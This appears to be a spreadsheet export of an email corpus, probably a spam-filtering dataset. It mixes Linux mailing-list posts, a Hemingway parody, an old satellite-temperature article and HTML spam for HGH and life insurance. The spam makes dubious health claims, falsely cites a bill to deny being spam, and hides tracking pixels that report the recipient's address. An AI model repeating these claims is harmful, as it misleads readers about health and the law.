 ZC5odG0iPmNsaWNrIGhlcmU8L2E+DQoNCisrKysrKysrKysrKysrKysrKysr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrKysrKysNClRoaXMgZW1haWwgaGFzIGJlZW4gc2NyZWVuZWQgYW5k
 IGZpbHRlcmVkIGJ5IG91ciBpbiBob3VzZSAiIk9QVC1PVVQiIiBzeXN0ZW0g
 aW4gDQpjb21wbGlhbmNlIHdpdGggc3RhdGUgbGF3cy4gSWYgeW91IHdpc2gg
 dG8gIk9QVC1PVVQiIGZyb20gdGhpcyBtYWlsaW5nIGFzIHdlbGwgDQphcyB0
 aGUgbGlzdHMgb2YgdGhvdXNhbmRzICBvZiBvdGhlciBlbWFpbCBwcm92aWRl
 cnMgcGxlYXNlIHZpc2l0ICANCg0KPGEgaHJlZj0iaHR0cDovLzIwMi4xMDgu
 MjIxLjE4L3d3dzI4Mi9vcHRvdXRkLmh0bSI+Y2xpY2sgaGVyZTwvYT4NCisr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
 KysrKysrKysrKysrKysrKysrKysrKysrKysrKysNCg0KOTA4bDMNCjUyMTdm
 clFHOC0wOTFpQm1INzUzM3ZQTFY4LTQxMWlFaU80MTU2WWhUUzItMjMwR2xr
 VDk3MzN1Z1FUMi00NjBVakFaMDU4OHZ5RWc4LTAzMG5sNzc=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: A message for our times
</t>
  </si>
  <si>
    <t xml:space="preserve">Rodent of Unusual Size wrote:
 &gt; I'm not up to forking the text, but for your entertainment:
 &gt; 
 &gt; http://www.kanga.nu/~claw/bug_count.html
 Fine, *I'll* fork it. This piece has been up on the wall of our
 CTO's office for years. It deserves to be forked, or even reforked.
 - Joe
 (BTW, RAID is the home-grown bug tracking system used at Microsoft.
 See e.g. http://www.stsc.hill.af.mil/CrossTalk/1995/oct/Shippin.asp.
 It was a fine tool, better than any other I've had to use...)
 The Bug Count Also Rises
 by John Browne
 (Imitation Hemingway Contest Winner)
 In the fall of that year the rains fell as usual and washed the leaves 
 of the dust and dripped from the leaves onto the ground. The shuttles 
 drove through the rainy streets and took the people to meetings, then 
 later brought them back, their tires spraying the mist into the air.
 Many days he stood for a long time and watched the rain and the shuttles 
 and drank his double-tall mochas. With the mochas he was strong.
 Hernando who worked down the hall and who was large with microbrews came 
 to him and told him that the ship day was upon them but the bugs were 
 not yet out. The bugs which were always there even when you were in 
 Cafes late at night sipping a Redhook or a double-tall mocha and you 
 thought you were safe but they were there and although Enrico kept the 
 floor swept clean and the mochas were hot the bugs were there and they 
 ate at you.
 When Hernando told him this he asked how many bugs. "The RAID is huge 
 with bugs," Hernando said. "The bugs are infinite."
 "Why do you ask me? You know I cannot do this thing anymore with the bugs."
 "Once you were great with the bugs," Hernando said. "No one was 
 greater," he said again. "Even Prado."
 "Prado? What of Prado? Let Prado fix the bugs."
 Hernando shrugged. "Prado is finished. He was gored by three Sev 2's in 
 Chicago. All he does now is drink herb tea and play with his screensavers."
 "Herb tea?"
 "It is true, my friend." Hernando shrugged again. Later he went to his 
 office and sat in the dark for a long time. Then he sent e-mail to Michaels.
 Michaels came to him while he was sipping a mocha. They sat silently for 
 awhile, then he asked Michaels, "I need you to triage for me."
 Michaels looked down. "I don't do that anymore," he said.
 "This is different. The bugs are enormous. There are an infinity of bugs."
 "I'm finished with that," Michaels said again. "I just want to live 
 quietly."
 "Have you heard Prado is finished? He was badly gored. Now he can only 
 drink herb tea."
 "Herb tea?" Michaels said.
 "It is true," he said sorrowfully.
 Michaels stood up. "Then I will do it, my friend," he said formally. "I 
 will do it for Prado, who was once great with the bugs. I will do it for 
 the time we filled Prado's office with bouncy balls, and for the time 
 Prado wore his nerf weapons in the marketing hall and slew all of them 
 with no fear and only a great joy at the combat. I will do it for all 
 the pizza we ate and the bottles of Coke we drank."
 Together they walked slowly back, knowing it would be good. As they 
 walked the rain dripped softly from the leaves, and the shuttles carried 
 the bodies back from the meetings.
 -- 
 The Combatant State is your father and your mother, your only
 protector, the totality of your interests. No discipline can
 be stern enough for the man who denies that by word or deed.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reverse Aging While Burning Fat
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
     &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
    &lt;title&gt;Lose weight while building lean muscle mass  and reversing the
 ravages of aging all at once&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;img src="http://track.direct4optin.com/tev.asp?eid=20887" height="1"
 width="1"&gt;
 	&lt;CENTER&gt;
 &lt;TABLE WIDTH=500 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 &lt;TR&gt;
 &lt;P&gt;&lt;CENTER&gt;&lt;FONT SIZE="1" FACE="Arial, Helvetica, sans-serif"&gt;
 The following message was sent to you as an opt-in subscriber to
 eNetwork. We will continue to bring you valuable offers on
 the products and services that interest you most. If you wish to
 unsubscribe please click on the remove link at the bottom of the page.
 &lt;/P&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;BR&gt;
 &lt;table BORDER WIDTH="52%" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="90%" BGCOLOR="#FFCC00"&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font
 color="#FFFFFF"&gt;&lt;font size=+2&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=10 CELLPADDING=0 COLS=1 WIDTH="100%" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%" BGCOLOR="#000000"&gt;
 &lt;center&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+2&gt;Human
 Growth Hormone Therapy&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+1&gt;Lose weight
 while building lean muscle mass&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+1&gt; and
 reversing the ravages of aging all at once.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+0&gt;Remarkable
 discoveries
 about Human Growth Hormones (&lt;b&gt;HGH&lt;/b&gt;) &lt;/font&gt;&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+0&gt;are changing
 the way we think about aging and weight loss.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 &lt;br&gt;
 &lt;center&gt;&lt;table WIDTH="442" BGCOLOR="#FFFFFF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="229" HEIGHT="2"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica,
 sans-serif"&gt;&lt;font color="#000000"&gt;&lt;font size=+0&gt;Lose
 Weight&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font
 color="#000000"&gt;&lt;font size=+0&gt;Build
 Muscle Tone&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font
 color="#000000"&gt;&lt;font size=+0&gt;Reverse
 Aging&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font
 color="#000000"&gt;&lt;font size=+0&gt;Increased
 Libido&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font
 color="#000000"&gt;&lt;font size=+0&gt;Duration
 Of Penile Erection&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;td WIDTH="199" HEIGHT="2"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica,
 sans-serif"&gt;&lt;font color="#000000"&gt;&lt;font size=+0&gt; New
 Hair Growth&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font
 color="#000000"&gt;&lt;font size=+0&gt; Improved
 Memory&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font
 color="#000000"&gt; Improved
 skin&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt; New
 Hair Growth&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt; Wrinkle
 Disappearance &lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;a
 href="http://209.236.57.11/c.php?cid=18135&amp;url=http%3A%2F%2Ftrack.direct4optin.com%2Fclicktrack.asp%3Feid%3D20887%26url%3Dhttp%253A%252F%252Fhealthylivingforever%252Ecom%252Fint02%252F"&gt;Visit
 Our Web Site and Lean The Facts: Click Here&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;p&gt; &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 			&lt;BR&gt;
 &lt;HR WIDTH=400&gt;
 &lt;BR&gt;
 &lt;TABLE WIDTH="400" BORDER="0" CELLSPACING="2" CELLPADDING="0"&gt;
      &lt;TR&gt;
        &lt;TD WIDTH="100%"&gt;
          &lt;P&gt;&lt;FONT SIZE="1" FACE="Arial, Helvetica, sans-serif"&gt;You are
 receiving this email
          as a subscriber to our mailing list. To remove yourself
          from this and related email lists click here: &lt;a
 href="http://209.236.57.11/c.php?cid=18135&amp;url=http%3A%2F%2Fremove.direct4optin.com"&gt;UNSUBSCRIBE MY
 EMAIL&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
          &lt;P&gt;&lt;FONT SIZE="1" FACE="Arial, Helvetica, sans-serif"&gt;&lt;BR&gt;
          Under Bill(s) 1618 TITLE III by the 105 US Congress, per Section
          301, Paragraph(a)(2)of S. 1618, a letter cannot be considered
          Spam if the sender includes contact information and a method
          of "removal".&lt;/FONT&gt;
          &lt;BR&gt;
          &lt;BR&gt;
        &lt;/TD&gt;
      &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;
 &lt;img src="http://209.236.57.11/o_e.php?cid=18135&amp;em=jm@NETNOTEINC.COM" height="0" width="0"&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Are you at risk? Get covered!...           CZFQNT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</si>
  <si>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href=3D"http://www.marketing-leader.com/user0202/termquotes/473400/index.h=
 tm"&gt;&lt;font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href=3D"http://www.marketing-leader.com/user0202/termquotes/473400/index.h=
 tm"&gt;&lt;font
 face=3D"arial"
 size=3D"5"&gt;
 &lt;b&gt;GET A FREE QUOTE NOW!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;font face=3D"arial" size=3D"2" color=3D"#000000"&gt;
 &lt;i&gt;You can't predict the future, but you can always
 prepare for it.&lt;/i&gt;&lt;/font&gt;
 &lt;/center&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;br&gt;&lt;br&gt;
 &lt;font face=3D"arial,verdana" size=3D1.5 color=3D"#8182AB"&gt;&lt;p
 align=3D"center"&gt;&lt;br&gt;&lt;br&gt;
 &lt;a
 href=3D"http://www.marketing-leader.com/light/watch.asp"&gt;to be
 excluded from future contacts &lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 aster
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Food 'cancer chemical' reaction identified
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8435176,1440/
 Date: Not supplied
 The reaction that forms the potential carcinogen acrylamide in baked foods is 
 revealed, suggesting ways of reducing levels
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Double Your Life Insurance at NO EXTRA COST! 29155
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
 -1"&gt;
 &lt;title&gt;Lowest Life Insurance Quotes&lt;/title&gt;
 &lt;style&gt;td {font-family: arial}&lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#ffffff"&gt;
 &lt;div STYLE=3D"FONT-FAMILY:TIMES"&gt;&lt;b&gt;&lt;font face=3D"ARIAL" color=3D"blue" si=
 ze=3D"6"&gt;
 &lt;p align=3D"center"&gt;The Lowest Life Insurance Quotes&lt;/font&gt;&lt;/b&gt; &lt;br&gt;
 &lt;b&gt;&lt;i&gt;&lt;font face=3D"arial" color=3D"red" size=3D"5"&gt;Without the Hassle!&lt;/f=
 ont&gt;&lt;/i&gt;&lt;/b&gt; &lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"ARIAL" color=3D"black" size=3D"4"&gt;Compar=
 e rates from the
 nation's top insurance companies&lt;/font&gt; &lt;br&gt;
 &lt;a HREF=3D"http://216.49.109.1/95-2/index.htm"&gt;&lt;b&gt;&lt;font face=3D"ARIAL" col=
 or=3D"blue" size=3D"5"&gt;Shop,
 Compare and Save&lt;/font&gt;&lt;/b&gt;&lt;/a&gt; &lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"ARIAL" color=3D"black" size=3D"5"&gt;Fil=
 l out the simple form,
 and you'll have the &lt;br&gt;
 15 best custom quotes in&lt;/font&gt;&lt;font face=3D"ARIAL" color=3D"red" size=3D"=
 5"&gt; 1 minute.&lt;/font&gt;&lt;/b&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;a HREF=3D"http://216.49.109.1/95-2/index.htm"&gt;&lt;font f=
 ace=3D"arial"
 color=3D"blue" size=3D"4"&gt;&lt;b&gt;COMPARE YOUR CURRENT COVERAGE&lt;/b&gt;&lt;/font&gt;&lt;/a&gt; =
 &lt;br&gt;
 &lt;font face=3D"arial" color=3D"blue" size=3D"3"&gt;to these sample 10-year lev=
 el term monthly
 premiums &lt;br&gt;
 (20 year, 30 year and smoker rates also available)&lt;/font&gt; &lt;/p&gt;
 &lt;div align=3D"center"&gt;&lt;center&gt;
 &lt;table border=3D"0" WIDTH=3D"468"&gt;
   &lt;tr&gt;
     &lt;td ALIGN=3D"CENTER" bgcolor=3D"#ffffff"&gt;&lt;/td&gt;
     &lt;td ALIGN=3D"CENTER" COLSPAN=3D"2" bgcolor=3D"#EEE8F6"&gt;$250,000&lt;/td&gt;
     &lt;td ALIGN=3D"CENTER" COLSPAN=3D"2" bgcolor=3D"#F2F2A1"&gt;$500,000&lt;/td&gt;
     &lt;td ALIGN=3D"CENTER" COLSPAN=3D"2" bgcolor=3D"#D0F4E5"&gt;$1,000,000&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td bgcolor=3D"#3B2556"&gt;&lt;font color=3D"#ffffff"&gt;Age&lt;/font&gt;&lt;/td&gt;
     &lt;td bgcolor=3D"#3B2556"&gt;&lt;font color=3D"#ffffff"&gt;Male&lt;/font&gt;&lt;/td&gt;
     &lt;td bgcolor=3D"#3B2556"&gt;&lt;font color=3D"#ffffff"&gt;Female&lt;/font&gt;&lt;/td&gt;
     &lt;td bgcolor=3D"#3B2556"&gt;&lt;font color=3D"#ffffff"&gt;Male&lt;/font&gt;&lt;/td&gt;
     &lt;td bgcolor=3D"#3B2556"&gt;&lt;font color=3D"#ffffff"&gt;Female&lt;/font&gt;&lt;/td&gt;
     &lt;td bgcolor=3D"#3B2556"&gt;&lt;font color=3D"#ffffff"&gt;Male&lt;/font&gt;&lt;/td&gt;
     &lt;td bgcolor=3D"#3B2556"&gt;&lt;font color=3D"#ffffff"&gt;Female&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td bgcolor=3D"#3B2556"&gt;&lt;font color=3D"#ffffff"&gt;30&lt;/font&gt;&lt;/td&gt;
     &lt;td bgcolor=3D"#EEE8F6"&gt;$12&lt;/td&gt;
     &lt;td bgcolor=3D"#EEE8F6"&gt;$11&lt;/td&gt;
     &lt;td bgcolor=3D"#F2F2A1"&gt;$19&lt;/td&gt;
     &lt;td bgcolor=3D"#F2F2A1"&gt;$15&lt;/td&gt;
     &lt;td bgcolor=3D"#D0F4E5"&gt;$31&lt;/td&gt;
     &lt;td bgcolor=3D"#D0F4E5"&gt;$27&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td bgcolor=3D"#3B2556"&gt;&lt;font color=3D"#ffffff"&gt;40&lt;/font&gt;&lt;/td&gt;
     &lt;td bgcolor=3D"#EEE8F6"&gt;$15&lt;/td&gt;
     &lt;td bgcolor=3D"#EEE8F6"&gt;$13&lt;/td&gt;
     &lt;td bgcolor=3D"#F2F2A1"&gt;$26&lt;/td&gt;
     &lt;td bgcolor=3D"#F2F2A1"&gt;$21&lt;/td&gt;
     &lt;td bgcolor=3D"#D0F4E5"&gt;$38&lt;/td&gt;
     &lt;td bgcolor=3D"#D0F4E5"&gt;$37&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td bgcolor=3D"#3B2556"&gt;&lt;font color=3D"#ffffff"&gt;50&lt;/font&gt;&lt;/td&gt;
     &lt;td bgcolor=3D"#EEE8F6"&gt;$32&lt;/td&gt;
     &lt;td bgcolor=3D"#EEE8F6"&gt;$24&lt;/td&gt;
     &lt;td bgcolor=3D"#F2F2A1"&gt;$59&lt;/td&gt;
     &lt;td bgcolor=3D"#F2F2A1"&gt;$43&lt;/td&gt;
     &lt;td bgcolor=3D"#D0F4E5"&gt;$107&lt;/td&gt;
     &lt;td bgcolor=3D"#D0F4E5"&gt;$78&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td bgcolor=3D"#3B2556"&gt;&lt;font color=3D"#ffffff"&gt;60&lt;/font&gt;&lt;/td&gt;
     &lt;td bgcolor=3D"#EEE8F6"&gt;$75&lt;/td&gt;
     &lt;td bgcolor=3D"#EEE8F6"&gt;$46&lt;/td&gt;
     &lt;td bgcolor=3D"#F2F2A1"&gt;$134&lt;/td&gt;
     &lt;td bgcolor=3D"#F2F2A1"&gt;$87&lt;/td&gt;
     &lt;td bgcolor=3D"#D0F4E5"&gt;$259&lt;/td&gt;
     &lt;td bgcolor=3D"#D0F4E5"&gt;$161&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;&lt;/div&gt;
 &lt;p align=3D"center"&gt;&lt;font SIZE=3D"4" FACE=3D"ARIAL,HELVETICA"&gt;&lt;a
 HREF=3D"http://216.49.109.1/95-2/index.htm"&gt;&lt;b&gt;Click Here to Compare!&lt;/b&gt;&lt;=
 /a&gt; &lt;br&gt;
 &lt;b&gt;&lt;i&gt;&lt;font face=3D"arial" color=3D"red" size=3D"3"&gt;It's fast, easy and FR=
 EE!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt; &lt;/p&gt;
 &lt;hr&gt;
 &lt;font size=3D"1"&gt;
 &lt;p align=3D"center"&gt;*All quotes shown are from insurance companies rated A=
 -, A, A+ or A++ by
 A.M. Best Company (a registered rating service) and include all fees and c=
 ommissions. &lt;br&gt;
 Actual premiums and coverage availability will vary depending upon age, se=
 x, state
 availability, health history and recent tobacco usage.&lt;/font&gt; &lt;/p&gt;
 &lt;/div&gt;&lt;/font&gt;
 &lt;p align=3D"center"&gt;To Unsubscribe, Reply with Unsubscribe in Subject!&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">But how did you get to the prom on it? I have an assortment of qubes and
 raqs here and they have lcd displays but I see no way of entering commands
 that way. You using a serial cable or something?
 &gt;  This is actually a raq3. Though, I do have an old raq2 that 
 &gt; Liam was helping me get netbsd on (about all you'll get on a 
 &gt; 16MB machine these days).
 &gt; 
 &gt;  Anyway, I wussed out, and copied hda1:/ to hda2:/boot and 
 &gt; set the bootfs to be hda2. It worked, though it's mounting an 
 &gt; ext3fs as ext2. But I'm getting there.
 &gt; 
 &gt; Kate
 &gt; 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: All set for Red Hat Linux 8.0
</t>
  </si>
  <si>
    <t xml:space="preserve">I would appreciate it if you could get Gabber packages for Red Hat 8. I 
 will be making a new release soon, but even in the meantime, 0.8.7 
 packages would be ok.
 I know that in the beta, red hat was using a modified version of 
 gnome-libs which is incompatible with the latest gnomemm. If this is 
 still the case in 8, I can send you a patch which makes gnomemm work 
 again...
 Julian
 On Monday, Sep 30, 2002, at 03:28 US/Eastern, Matthias Saou wrote:
 &gt; Hi all,
 &gt;
 &gt; All freshrpms.net is now set for the imminent release of Red Hat Linux 
 &gt; 8.0.
 &gt; The whole release process is a lot less secret as usual since there 
 &gt; have
 &gt; been some leaks, including a mirror purposely wide open :-(
 &gt;
 &gt; See this article about the release and the leaks :
 &gt; http://news.com.com/2100-1001-959434.html?tag=fd_top
 &gt;
 &gt; As it's no secret anymore, the files will be available today (morning 
 &gt; for
 &gt; you Americans, afternoon for us Europeans), and to go with them, there 
 &gt; are
 &gt; already quite a few freshrpms.net packages ready!
 &gt;
 &gt; Mirror list for download (they're not open yet) :
 &gt; http://freshrpms.net/mirrors/psyche.html
 &gt;
 &gt; New freshrpms.net package list :
 &gt; http://psyche.freshrpms.net/
 &gt;
 &gt; Of course, apt is also available (now version 0.5.4!) and fully 
 &gt; tested. If
 &gt; you like apt for your desktop machines, I also recommend checking out 
 &gt; the
 &gt; new "synaptic" package as it has now been ported to gtk+ and blends
 &gt; perfectly into the distribution!
 &gt;
 &gt; I'll probably post to the list once I open up ftp.freshrpms.net so you 
 &gt; can
 &gt; be the first ones to get in and download, although I doubt you'll have
 &gt; trouble finding access to at least one fast mirror using my mirror 
 &gt; list.
 &gt;
 &gt; Have fun with Psyche!
 &gt; Matthias
 &gt;
 &gt; -- 
 &gt; Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 &gt; Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 &gt; Load : 0.16 0.18 0.17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</si>
  <si>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Subject: [Same thread ish] [ILUG] adsl router modem combo
</t>
  </si>
  <si>
    <t xml:space="preserve">having great fun trying to find a dumb ADSL modem with Ethernet
 presentation, everybody wants to sell routers but I intend on doing pppoe
 from another device, something with more than one Ethernet port would be
 nice.
 anybody got any recommendations ?
 Uly
 ----- Original Message -----
 From: &lt;joefitz@netsoc.ucd.ie&gt;
 To: &lt;decdelmur@iol.ie&gt;
 Cc: &lt;ilug@linux.ie&gt;
 Sent: Monday, October 07, 2002 10:35 AM
 Subject: Re: [ILUG] adsl router modem combo
 &gt; It seems to only support PPPoA and not PPPoE. You need one that supports
 &gt; PPPoE, if you want torun it in routed IP mode. If you are using it as a
 &gt; bridge, it'll probably work, but you'd be left leaving the computer on,
 &gt; which would defeat the purpose of getting a router.
 &gt;
 &gt; The best router I've come accross is the Zyxel 643. Eircom supply this,
 &gt; but if you have alook online you can probably find it cheaper to buy
 &gt; online from America or the UK.
 &gt;
 &gt; Hope this is useful,
 &gt; Joe
 &gt;
 &gt;
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 information.
 &gt; List maintainer: listmaster@linux.ie
 &gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[2]: [ILUG] hwclock
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; On 0020 +0100 %{!Mon, Aug 19, 2002 at 11:30:12PM +0100}, Anthony wrote:
 &gt;&gt; to the net. However, I didn't realise that Windows altered the hw clock
 &gt;&gt; as there was no mention of it in any of the docs I read. &gt;&gt; I still dual-boot on a regular basis and if Windows is sneakily messing
 &gt;&gt; with the clock, I'd be interested to know in what way it is and how it
 &gt;&gt; couild be stopped from doing so.
 &gt; In my experience Windows will change the hardware clock the first time
 &gt; you boot into it after the clocks have gone forward/back an hour.  This
 &gt; will only happen twice a year. How to stop it, I have not checked (I
 &gt; just switch the clock back an hour from within windows after such a
 &gt; reboot).  Is there a GMT windows timezone?
 Start-&gt;Settings-&gt;Control Panel-&gt;Date/Time-&gt;Time Zone tab-&gt; Uncheck
 "Automatically adjust clock for daylight saving change".
 Ciaran
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">[Skip Montanaro, to Anthony Baxter]
 &gt; ...
 &gt; Accordingly, I wrote unheader.py, which is mostly a ripoff of something
 &gt; someone else posted to python-dev or c.l.py within the last week or so to
 &gt; strip out SA-generated headers.
 Unless I've grown senile tonight, you got it from Anthony to begin with.
 Please check it in to project, and add a short blurb to README.txt!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Goodbye Global Warming
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ... and say hello to the cool:  Oooo ... /this/ is going to cause
 some stir ...
 http://www.atmos.uah.edu./essl/msu/background.html received via
 http://ontario.indymedia.org:8081/front.php3?article_id=12280
 Using satellites to monitor global climate change
 Earth System Science Laboratory
 The University of Alabama in Huntsville
 For Additional Information:
 Dr. John Christy, Associate Professor of Atmospheric Science
 Earth System Science Laboratory, The University of Alabama in Huntsville
 Phone: (205) 922-5763 E-mail: christy@atmos.uah.edu
 Dr. Roy Spencer, Space Scientist
 Global Hydrology &amp; Climate Center, NASA/Marshall Space Flight Center
 Phone: (205) 922-5960 E-mail: roy.spencer@msfc.nasa.gov
 SUMMARY
 As part of an ongoing NASA/UAH joint project, Dr. John Christy of UAH and Dr. Roy Spencer of NASA's Marshall Space Flight Center use data gathered by microwave sounding units (MSUs) on National Oceanic and Atmospheric Administration TIROS-N satellites to get accurate, direct measurements of atmospheric temperatures for almost all regions of the Earth, including remote deserts, rain forests and oceans for which reliable temperature data are not otherwise available.
 The accuracy and reliability of temperature data gathered by the satellites since January 1979 has been confirmed by comparing the satellite data to independent temperature data. A recent study (1) found a 97 percent agreement between the MSU data and temperatures measured by thermometers suspended beneath weather balloons released by meteorologists for weather observations.
 Once the monthly temperature data is collected from the satellites and processed, it is placed in a "public" computer file for immediate access by atmospheric scientists in the U.S. and abroad. It has become the basis for a number of major studies in global climate change, and is cited in reports from the Intergovernmental Panel on Climate Change.
 GATHERING THE DATA
 While traditional thermometers measure the temperature at a specific point in the air, a microwave sounding unit on a satellite takes readings that are average temperatures in a huge volume of the atmosphere. Each of the more than 30,000 readings per day per satellite is an average temperature for more than 75,000 cubic kilometers of air.
 The MSU makes a direct measurement of the temperature by looking at microwaves emitted by oxygen molecules in the atmosphere. The intensity of the microwave emissions - their "brightness" - varies according to temperature.
 Christy and Spencer developed a method to take the data from several satellites and produce a unified temperature dataset.
 VERIFYING THE ACCURACY OF MSU MEASUREMENTS
 A recent comparison (1) of temperature readings from two major climate monitoring systems - microwave sounding units on satellites and thermometers suspended below helium balloons - found a "remarkable" level of agreement between the two.
 To verify the accuracy of temperature data collected by microwave sounding units, Christy compared temperature readings recorded by "radiosonde" thermometers to temperatures reported by the satellites as they orbited over the balloon launch sites.
 He found a 97 percent correlation over the 16-year period of the study. The overall composite temperature trends at those sites agreed to within 0.03 degrees Celsius (about 0.054 Fahrenheit) per decade. The same results were found when considering only stations in the polar or arctic regions.
 "The idea was to determine the reliability of the satellite data by comparing it to an established independent measurement," Christy said. "If satellite data are reliable when the satellites are over the radiosonde sites, that means you should be able to trust them everywhere else."
 The 99 radiosondes reported an aggregate warming trend of 0.155 degrees Celsius (about 0.28 Fahrenheit) per decade since 1979. Over those 99 spots on the globe, the satellites also recorded a warming trend: 0.128 degrees Celsius (about 0.23 Fahrenheit) per decade.
 Globally, however, the satellite data show a cooling trend of 0.03 degrees Celsius per decade since the first NOAA TIROS-N satellites went into service.
